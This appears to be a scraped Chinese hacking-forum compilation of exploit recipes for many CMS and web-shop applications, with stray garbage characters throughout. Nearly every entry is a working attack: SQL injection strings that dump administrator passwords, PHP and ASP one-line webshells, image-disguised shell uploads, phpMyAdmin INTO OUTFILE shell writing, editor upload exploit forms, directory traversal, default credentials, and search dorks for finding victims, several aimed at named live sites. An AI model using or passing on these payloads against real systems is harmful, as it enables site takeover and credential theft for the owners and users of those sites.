启航企业建站系统 cookie注入漏洞通杀所有版本
& c( x$ Z. ^9 {2 X
. V6 l+ w5 y# ]' X% j4 u直接上exploit:, E+ w' W+ Q2 E
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));* t; J4 ~# H. j: N: U" Q
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
0 X1 G; b/ V# {, R& D9 _" o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( z. Z8 t+ K5 h# `! T# P. d# `
Asprain论坛 注册用户 上传图片就可拿到webshell0 W1 O$ z' e. R A
A2 J( \) b/ g* V2 s( H
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。: N+ i$ [" O5 n
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
0 A" T( y- F H+ U* A2.gif 为一小图片文件,一定要小,比如qq表情图片) K, D; r3 ] F+ Q
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
* |4 L( e7 n' N9 _+ v) R4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
8 X$ [ U, O$ O5.q.asp;.gif6 m4 d/ P, {: g5 w# O& X5 }
google:Powered by Asprain
+ R. c$ M& @4 Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 w# k0 ~. n5 j& S
! t$ y9 R8 p) r2 x' S% kShopNum1全部系统存在上传漏洞。! r8 [0 E7 U4 M) K' d
* |9 f" t% E G
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
- T {+ Q, @4 e: v) t/ G% M按说明 提示登录后台。。 V% B6 R% ^" c& }5 D* \9 w) l8 u
在后台功能页面->附件管理->附件列表) s) N* V$ [) o& C5 E+ O
可以直接上传.aspx 后缀木马) n1 e7 A! H3 f' d
http://demo.shopnum1.com/upload/20110720083822500.aspx
& m* }5 E0 @- ~/ o/ `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. c: `, }' f4 V" r0 ]5 d' t
5 i6 Q" u' L" o( b# Z+ a$ p
牛牛CMS中小企业网站管理系统 上传漏洞/ c& P# _5 b# ^9 E Y6 t, N
0 W- {# v0 Q B5 G# R% s* \) A牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。1 L- H; B; a- G- x' n
后台:admin/login.asp
) s8 o# i0 l+ v: c7 |) Eewebeditor 5.5 Nday9 ]6 ]; _( x. Q O: Y
exp:
2 ~; b L- S9 Q3 S D4 s. y0 ?<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?/ g: Q: Z- T5 s8 ]& O7 P
<input?type=file?name=uploadfile?size=100><br><br>?% I; J- i+ A7 y$ A" a
<input?type=submit?value=upload>?& w, v( T: Y# |4 @! R* z
</form>" H; M: K/ W- ^8 M7 v/ V) r( l
ps:先上传小马.3 J) Z# F' U2 M" W0 c P. ^9 c& v
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏6 Z% y% n6 Y W) x% M
2 s: V/ O* G$ {( g* ?8 a4 ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 W0 N" I. B) ^2 | o4 _. G1 _; l$ k" F
YothCMS 遍历目录漏洞
0 f6 ~6 X3 q/ [4 E# D) s
; a0 Q5 ]0 I9 R2 d1 f- `优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。% X2 o/ B2 s- c+ d$ s
默认后台:admin/login.asp9 c. R+ ~$ B8 L1 r+ s* ?( H
遍历目录:
0 L" J/ J; h2 B( G4 t& i' g- o2 Oewebeditor/manage/upload.asp?id=1&dir=../
: v* \# L5 q# r/ _data:! e4 g% @( ]& N7 g5 F: r6 ~
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa r1 `, t' X2 ]1 N. w8 h6 T
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ ~2 R% Y T1 o. S
$ R% a9 h) ` B3 M5 W4 s
Net112企业建站系统 1.0 J; x9 [& g5 h( D' e, p2 z7 Z, C+ X: S
" U% H( B& I; v) J
源码简介:
; S4 S8 Z% G9 n5 N8 c4 lNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
) g0 Y# \$ g& ]& t添加管理员:
( p- I4 u4 |5 N8 vhttp://www.0855.tv/admin/admin.asp?action=add&level=2
& m2 ]* l7 C1 s+ P其实加不加都不是很重要,后台文件都没怎么作验证。( ~' ]4 @) U( g' D1 q; `" m! E- b
上传路径:
( l" l, C: E2 h8 g6 `$ I% ?. A2 Vhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2003 I, ?/ g4 g& S& `$ g! ~
http://www.0855.tv/inc/Upfile.asp?Stype=2
& Y7 i( w6 n3 p' m* P3 e: O怎么利用自己研究。* Z2 a8 }! q4 R1 E2 P: r8 N- e! n
遍历目录:
8 @6 @' R' G. Yhttp://www.0855.tv/admin/upfile.asp?path=../..2 J* ?" W# N" H" v; ~" z8 k
如:+ `: |0 v8 z6 b9 o
http://www.0855.tv/admin/upfile.asp?path=../admin. W3 l: t4 R8 h, e1 H
http://www.0855.tv/admin/upfile.asp?path=../data F. b; g' Y4 r! O+ p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" P/ ~# |4 e0 x8 D
/ y' p. D% w4 x易和阳光购物商城通杀 上传漏洞8 b1 R7 D- w! ?
" {4 Y+ q; b4 _2 h p* m4 E前提要求是IIS6.0+asp坏境。- ?% K/ d' F1 _
漏洞文件Iheeo_upfile.asp # h% f# P! Z6 V: I, c
过滤不严.直接可以iis6.0上传
. C: {2 v1 e: w% @6 e/ ]把ASP木马改成0855.asp;1.gif' X- Z# u5 ~( z9 w6 D& j
直接放到明小子上传
% g. R& Q6 T0 w3 s4 rGoogle搜索:inurl:product.asp?Iheeoid=( G* N% q6 W+ d; h
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) q- ^6 `0 E! v. |7 x4 B+ |- ]
/ H9 R: U$ n: K8 R! x, e/ X
phpmyadmin后台4种拿shell方法4 a2 i4 X% {0 O. U0 J1 ]
3 }7 [( m- q/ n& m# T
方法一:
1 e1 v* B( Z5 k: ECREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );! u" s4 a, y/ J6 ^. g2 L
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');9 E- m1 L$ ^& J
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';3 h( ^( f% {' B
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
8 R# ]% G m+ B& d8 a一句话连接密码:xiaoma
/ x, X: ~9 o Q H方法二:
: z3 Z$ S8 G* x, ACreate TABLE xiaoma (xiaoma1 text NOT NULL);5 N, c# G6 ^' Z4 E9 r. ~0 p
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');! |9 i. T# f7 S+ F/ z9 I
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
& A6 a/ z& ~% r/ iDrop TABLE IF EXISTS xiaoma;
- c4 M5 H& r& g2 m7 q: @6 w方法三:9 O3 a$ g7 U% e$ F5 w2 Z0 n& F
读取文件内容: select load_file('E:/xamp/www/s.php');/ F" O6 H& R! |! R( x2 n" Q
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'9 O' ?' s" Q4 n; { v% ~
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'3 N/ d8 d9 e) I: y
方法四:* ~. t& y$ R, @- s
select load_file('E:/xamp/www/xiaoma.php');
' M o6 \" H- B7 Z- X; x$ [select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 E4 \% k" |* D) d2 O: z9 Z8 w- z然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
- p8 `7 O/ V' Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* F0 ^8 V. ~) l9 |; }
5 | P2 T- {& D
传信网络独立开发网站源码0day漏洞5 |: R; g: W+ j
# C* g9 w, j$ J' y* [5 c3 G后台system/login.asp
. u" ]% m# f' [1 I进了后台有个ewebeditor% q$ ?- T9 j0 o. g+ K
Google 搜索inurl:product1.asp?tyc=
! o Q3 q4 [; W& o" h1 F6 X编辑器漏洞默认后台ubbcode/admin_login.asp
% |5 H% t% E- E* u# o. M数据库ubbcode/db/ewebeditor.mdb. e+ P( d# z3 E' J7 n( k
默认账号密码yzm 111111
! u* B2 O/ b8 ]+ r/ z3 d* R$ J7 R: k* C
拿webshell方法
4 Y$ h# @9 K9 g1 t: m9 W登陆后台点击“样式管理”-选择新增样式
' d2 R" r3 u3 s6 }( o样式名称:scriptkiddies 随便写 + ]+ {/ l k9 Z. U" m
路径模式:选择绝对路径 ( [! n5 w/ j7 v5 J1 ^2 R! z) ^
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx7 K3 Z* U8 r' Q A
图片类型比如就是我们要上传的ASP木马格式
! o" ~' l* Y9 j& f# Z7 f上传路径:/$ Z4 Q- R" f* i _
图片限制:写上1000 免的上不了我们的asp木马
1 o8 M- ~* Z% v- k% |上传内容不要写3 X! H7 E8 k) W$ N
可以提交了 , F6 A2 w( L# L6 F, h* Z9 O* u& w) u/ f
样式增加成功! 5 Y9 v) M$ U* R& a
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 6 O) {3 `4 U& Y4 Q2 l8 \. p/ y
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置; f) k2 \" g* w" `# k) [
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
) C3 N5 x6 Y' @$ T5 H上ASP木马 回车 等到路径. M+ l1 B' k$ ]5 [ ^9 w
- K: v# i1 N8 f' V# B6 {/ C
后台:system/login.asp4 O2 ?: ?- V- @/ z# n: D r" w$ l0 X
Exp:! u" Y6 {: ^3 b& I/ N ^& R
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master: t% _- R& @" r/ G/ w; f6 F
测试:
3 y/ {7 d3 R2 r7 F2 o+ @http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master7 ?; R: p2 w4 x
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
4 i% o/ x! N/ x' c" A% F; c6 r2 u--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ I6 X3 X2 s9 n' p- A2 R3 o$ v
2 j7 ^) U/ W/ l% H1 l) ~$ c5 w' f: _* u; _
foosun 0day 最新注入漏洞3 a. |( Z: v o ~9 A# w+ O
! x, X; L+ R6 c; x漏洞文件:www.xxx.com/user/SetNextOptions.asp
. o( @$ L# ~ f) J! q利用简单的方法:8 A: K. A( f: K+ U, k2 P b# e
暴管理员帐号:
: j% ]: T" p8 e9 v7 E# @' mhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
$ W" R& C0 ^, N: [ F3 L暴管理员密码:& C6 y# y8 K" R. n5 s
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,( T- B0 ]; d2 Z4 Z! B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ O/ N! z9 x0 g) w
# a, Y8 G: y& m! D# _+ ?网站程序的版权未知!9 L. n0 D( U$ Q- d
9 k; |, W3 `+ e
默认网站数据库:
: }5 U8 t& |8 Z3 q' }www.i0day.com/data/nxnews.mdb
8 @) Q5 `( @8 `6 N: Vewebeditor 在线编辑器:
9 e2 y) o8 [7 Q7 l+ M编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb _% t) E; R; M! W7 V' z
登录地址:ewebeditor/admin_login.asp
/ U9 |& n1 w$ P# F4 S" P5 C默认密码:admin admin$ f0 M! I/ D/ K; e! m% E
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data- r+ l _& A0 n9 r9 b
" ~2 J a! a, N+ w
Sql注入漏洞:( J" R8 ]' m% h
http://www.i0day.com/detail.asp?id=121 @; T2 ^; O8 w! c
exp:
- Q8 t, d t3 h& A2 Gunion select 1,admin,password,4,5,6,7,8 from admin
$ D5 t, n" F& l0 V B. s爆出明文帐号/密码
6 V9 J8 G, ^; P% y! m! c7 O ^" a( ]9 Q' t# S9 r1 D9 p
上传漏洞:6 A' G q& f: d3 ?, \
后台+upfile.asp
8 l: w9 B9 _# T+ l7 J如:
: n- r6 d& m& G2 \8 rhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。" q$ l) ~+ f9 F+ ]$ F
shell的地址:网址+后台+成功上传的马- J) n! Y6 y' w9 Q- [' N7 }
google:inurl:news.asp?lanmuName=
" h4 y& {8 Y0 [------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# o. ]! t* k1 v( c$ y$ Y3 _# f) q: \: r
dedecms最新0day利用不进后台直接拿WEBSHELL
- Y t7 B1 Q) G- z8 a- m7 ~0 c8 E4 D& j( G4 c0 Z
拿webshell的方法如下:
/ H5 u* V& c7 @) ~网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
& r4 C+ L k* F A4 {# d前题条件,必须准备好自己的dede数据库,然后插入数据:) v8 L# W/ R( {1 i+ o* `/ X
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
" n# e k' _; I/ P) O6 b
! O/ J0 v' ~+ F. ?4 ?% p. H再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
5 i+ D* d' r; [4 R8 t<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">; m+ ~; o* [' X$ G0 b6 Q6 Z
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />, @7 d5 u: F |5 b: K3 S
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
: p$ y& {# K1 K, V" F, X" C<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />5 ~' L. H8 e* W% ?3 v0 H: {
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />$ ?/ S1 Q' z/ E$ W5 n* m y. l3 `
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />0 V* f: O7 c/ h( A* p
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
" q/ J5 r! c' o1 X<input type="text" value="true" name="nocache" style="width:400">
% X8 u* C, r5 E; K' Y+ j# b3 S1 t) C<input type="submit" value="提交" name="QuickSearchBtn"><br />' P' N$ e0 `0 M( y& p1 a0 J
</form>
n' j& n; s' _9 S<script>( _$ a5 ~5 W/ V+ _
function addaction()3 f: H1 \/ W0 \% ?" U7 D$ B6 ]6 E
{ v4 Z9 k7 F) i# \2 ^3 r" ]
document.QuickSearch.action=document.QuickSearch.doaction.value;
' t u$ V6 B- ^( ^7 G" o}
# G0 ]4 O" s8 ~% p5 |</script>& H5 Z2 o/ q* W' C' Z0 i$ d
-----------------------------------------------------------------------------------------------------------------------------------------------
; k& X4 i$ m2 T- |
7 A) {' i4 R% s! X4 D1 o9 i2 Idedecms织梦暴最新严重0day漏洞. h- t! q% e$ L+ C9 `. @8 S
bug被利用步骤如下:
+ d. ^0 f- \8 `/ C8 U: p' |http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
) V2 |9 t, X y9 ~4 x3 \9 u `/ R把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
) d0 J3 W$ P) y' G' |-------------------------------------------------------------------------------------------------------------------------------------------, N q: Q( y5 l! m* k
, S" |1 T y9 w多多淘宝客程序上传漏洞
$ h7 k( E8 Z9 M9 V+ z漏洞页面:4 Z9 k, u, c1 B/ a1 C) o
admin\upload_pic.php/ K+ H$ H8 I; W" W4 P# A
传送门:) x+ f6 E! @8 {! }) B1 b' g
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
) S7 G! H% p3 x/ h: yPS:copy张图片马 直接 xxx.php 上传抓包地址!9 o8 Y2 I- F0 W/ g* w6 T! ^ C
------------------------------------------------------------------------------------------------------------------------------------------------------$ C' f1 M" t+ c K# ]
% k. V0 g' Y! t2 t: f无忧公司系统ASP专业版后台上传漏洞" e$ N$ m) V8 S5 c" c+ B6 L) T& X9 R
漏洞文件 后台上传/ s# m' C2 ]" b) t% ~1 R
admin/uploadPic.asp' C4 \/ L! d+ c( w
漏洞利用 这个漏洞好像是雷池的: X- @3 e" |# A/ P7 x# o7 m
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1 V, i! h) }% y9 g& z7 ?
等到的webshell路径:" h( O O; }) B$ o& {
/UploadFiles/scriptkiddies.asp;_2.gif( `6 m/ @/ K A# N2 ]
---------------------------------------------------------------------------------------------------------------------------------------------------7 ~. P& e0 `0 x! s( j5 ]$ |1 T7 z
) r6 n/ B8 k* j" F* D住哪酒店分销联盟系统2010
0 e/ Z. e! C+ F. [6 @Search: T$ c; d/ ]8 Q1 T: Y7 ^
inurl:index.php?m=hotelinfo
" {* c2 a1 c' w* c% E5 c ^http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
# D! N& F$ C. j- R' ?2 V" o4 {默认后台:index.php?m=admin/login' o1 S, e$ Q# G* _$ j
--------------------------------------------------------------------------------------------------------------------------------------------------5 O' X) Q3 r; @
+ ^$ E7 L, E# Minurl:info_Print.asp?ArticleID=
# t) V) ^% ?' d1 |8 q+ B后台 ad_login.asp
( D, q) j1 m- z7 t1 E/ Q4 C7 u爆管理员密码:% l7 I0 S9 T6 o9 ^& I
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin# a/ b( L# k& z+ m; A5 F9 Z
------------------------------------------------------------------------------------------------------------------------------------------------------------
% M! l" A/ h3 R j$ `$ C% {
+ w" l" p+ W' C7 A搜索框漏洞!
! a- i& E7 O" c9 h%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
+ Y- e. C/ r3 l5 p6 U7 S5 u--------------------------------------------------------------------------------------------------------------------------------------------------------7 h) Z5 A5 r& c. z
9 w: Q) f7 ~4 Q+ j& z关键字:/ C O+ \, U6 }
inurl:/reg_TemletSel.asp?step=2
6 b2 h @0 D7 \# a$ r或者
3 N, @ _+ i8 l9 _/ Z& ]电子商务自助建站--您理想的助手2 o( e1 G& a) @$ X
-------------------------------------------------------------------------------------------------------------------------------------------------
% n! P& u- E* O# D4 Q* r# U& t4 O( w6 G* r+ }4 ~6 q
iGiveTest 2.1.0注入漏洞- s3 e4 j; d! R* x/ e2 M
Version: <= 2.1.0
6 w# k# I8 ]5 `( A# Homepage: http://iGiveTest.com/
/ u8 E/ D8 ^" Y, ~! L5 z. G谷歌关键字: “Powered by iGiveTest”
8 O" ~$ E8 N4 t( T- {( h随便注册一个帐号。然后暴管理员帐号和密码
1 j# T/ G( V, b: c1 Y; ^http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1# R7 G6 X% }9 m, n5 U) G
------------------------------------------------------------------------------------------------------------------------------------------------$ |4 T% \" Z8 w' ?! D4 f
; Y( E+ M m+ l/ W0 I J7 c- ]( X
CKXP网上书店注入漏洞: s5 _# U3 T- C3 o% E, K+ q& a
工具加表:shop_admin 加字段:admin
; n* v5 f) i: X0 I) d8 q+ ?后台:admin/login.asp
- @: F8 Q& S( S1 D- r1 Z( ]登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
7 u1 s6 J% I R' T4 i6 Yinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
8 n' c% s) M- M0 x5 R: ]3 o# k* y/ A' n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# u* j, J% W2 i% t- q$ J! f( c; g8 C; `
( n1 d2 t7 h+ h7 w
段富超个人网站系统留言本写马漏洞, X$ |! k7 R i$ w1 p( W
源码下载:http://www.mycodes.net/24/2149.htm; ~7 w. w5 Y5 q( i. t; }& O' h
addgbook.asp 提交一句话。# b8 N1 ` R) U& \1 b' l& |; i+ Q
连接: http://www.xxxx.tv/date/date3f.asp# z& [9 E% k" N! S! ~3 C
google:为防批量,特略!
5 u6 Y! J. C' y6 v2 F2 ?( R-------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 g' n3 [& ]5 A! q2 ?* c! o$ r, p
* D t# D: A* E4 A9 I M智有道专业旅游系统v1.0 注入及列目录漏洞. t4 B: }' g* B# U" V. ^
默认后台路径:/admin/login.asp
( \9 R. b3 Z' h) X# H7 V) q6 J0 A默认管理员:admin
# `. y( n; }, h& @默认密码:123456
: ]; J$ E4 [& g# t2 ^4 |SQL EXP Tset:
( L7 v: u7 k9 f% ^$ _http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin4 G: _$ l- T) M5 D8 P" C( d
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: L- Q: B4 k8 X) Q$ ]0 }% X5 j' n: p+ e
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
7 R- Q$ C5 E* K, L) rEXP:" M( x( Y8 `0 `$ [
<title>eWebeditoR3.8 for php任意文件上EXP</title>2 Z& j' j$ q& M6 |( _. A6 r
<form action="" method=post enctype="multip+ e4 J- t6 U" U
art/form-data">
2 A/ X" L5 z7 d' S+ j<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ) N" X4 G: h# k: I
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
2 `8 J: T8 B4 r* D* c2 v<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
; y3 @; ?+ n$ R- N) E3 Efile:<input type=file name="uploadfile"><br> ' }$ j6 o: R6 M! u6 t) z* m0 R* w
<input type=button value=submit onclick=fsubmit()>
8 a* k0 Q5 G; Y</form><br>
' l$ c& a* i2 l$ f8 w& k, f6 ?9 I<script>
, ^7 }; s) c; [; Q3 h! vfunction fsubmit(){ : R& F9 A2 d6 U- J% B1 l+ i. y
form = document.forms[0]; 3 t; B3 N! x! D
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
2 g5 i& v: K D0 talert(form.action);
9 P4 B, f6 [, V, g% z& k5 B3 Aform.submit();
9 V* a1 d, C4 c2 I% K' }/ f- M" H} : Y' X5 U1 `& j
</script>: A2 l( h" f( O: N6 \ U. Q! r
注意修改里面ewebeditor的名称还有路径。* q+ v f: t) f d9 M+ R* I
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. W0 w2 Y6 d3 M; u; m; ^
5 L1 U& e% U6 {, f4 b4 B. V6 [提交’时提示ip被记录 防注入系统的利用. _4 h% A) d7 p: u( o% y
网址:http://www.xxx.com/newslist.asp?id=122′5 |& ^; e8 k& S! ?8 S" {6 @
提示“你的操作已被记录!”等信息。% t2 J4 ^0 F8 q6 h. }, a, u
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。% d7 f( Y. R6 k: P0 G' V* ^ W
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: \3 Y% E0 }- T. e) A2 g( o; m
3 ]$ k/ A3 o. t; N西部商务网站管理系统 批量拿shell-0day- B) [8 s3 X6 O. N+ \4 }' N
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ( Z- K/ D# B& Y1 [8 t- k
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
/ z9 |4 s, g/ s k2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
9 @5 J! v' q& A) F3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
" r$ [. T" P+ y' B! Q---------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 `$ {6 T* a, h9 a5 L" m' [
& _. t+ ~! Y: EJspRun!6.0 论坛管理后台注入漏洞
( @8 `6 N- B0 l# f
- Z0 k( Y" l" O3 A; S! SSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
; d& d) _5 b8 y3 r! y0 GJspRun!6.0
: h" b f1 p3 Q( O2 e漏洞描述:
a/ n6 \7 h' ]% t1 XJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
, B' \( y6 V$ Z6 S9 N/ _) S8 ]* y在处理后台提交的文件中ForumManageAction.java第1940行
$ C" |8 p: X7 w/ YString export = request.getParameter("export");//直接获取,没有安全过滤! w' `9 r/ b/ D! e/ O* \3 @3 W
if(export!=null){
) k; ~* F5 R7 v# `( QList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
% k u; O' C& g2 t# X' s3 i/ ^if(styles==null||styles.size()==0){
# n* y# F3 y0 C. t<*参考
0 Q2 u2 A# T5 T" C& |* K. D( Dnuanfan@gmail.com+ V: C, c0 Q1 \: H% I6 [
*> SEBUG安全建议:
+ ?# D6 N" g( {* \1 a& Nwww.jsprun.net
9 L# x3 f9 ]6 H8 f4 a9 t8 `(1)安全过滤变量export/ B0 f# B/ S1 {# ^/ u @- [( M
(2)在查询语句中使用占位符( `' g; j0 i' E7 D
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( s4 L3 P- X) D8 R- [: t! _+ J# {4 j6 m1 T& e
乌邦图企业网站系统 cookies 注入
2 {' f; q5 L2 a* x" h1 m
3 u' L& `7 Y! m1 e h- g程序完整登陆后台:/admin/login.asp! m& R+ N( u7 Z# V) T
默认登陆帐号:admin 密码:admin888
* R! ^2 ]- I/ m+ d* Q5 j8 j; V* U# s6 ?3 \语句:(前面加个空格)
I& {/ j3 |! a' y' f6 Pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin# V4 V9 j- c- n7 s6 U' M4 b/ Z
或者是16个字段:
/ I- h* A+ n" j; g. fand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
$ v8 \/ g. O7 Z0 J* y爆不出来自己猜字段。3 M4 `) U! g- `9 v1 U
注入点:http://www.untnt.com/shownews.asp?=88
' p: \) b# H' }, X+ x+ T. Vgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
& l2 U8 C+ U2 s. D# D0 _关键字:
& G- j' i# x+ kinurl:shownews?asp.id=
. K% [: ]& z- }: {0 v-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, z4 B0 A R: ?7 A s1 R* y/ ~
H: a( Q0 K4 ?5 c. q5 QCKXP网上书店注入漏洞
8 L" }' e0 X L* {6 i1 s% G4 E8 A) N1 y6 ^) N7 {5 z4 x6 |5 M4 V
工具加表:shop_admin 加字段:admin& V! L( ~: F/ R# G
后台:admin/login.asp ) n M* M7 _9 D% A. w" A
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/& ]( X( {. S: U% w: z* h$ I1 r
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
& `5 v ]/ Q/ n* p% |% W3 [---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- _2 v w' w9 z b; P
$ g( P1 a0 y# A0 ~: M' ?7 AYxShop易想购物商城4.7.1版本任意文件上传漏洞
) A; V) c. V& a n9 \$ I8 l, m0 [* C4 ^; e7 |
http://xxoo.com/controls/fckedit ... aspx/connector.aspx6 a, r3 p- M2 w! I
跳转到网站根目录上传任意文件。: P) @6 x/ `, [& w
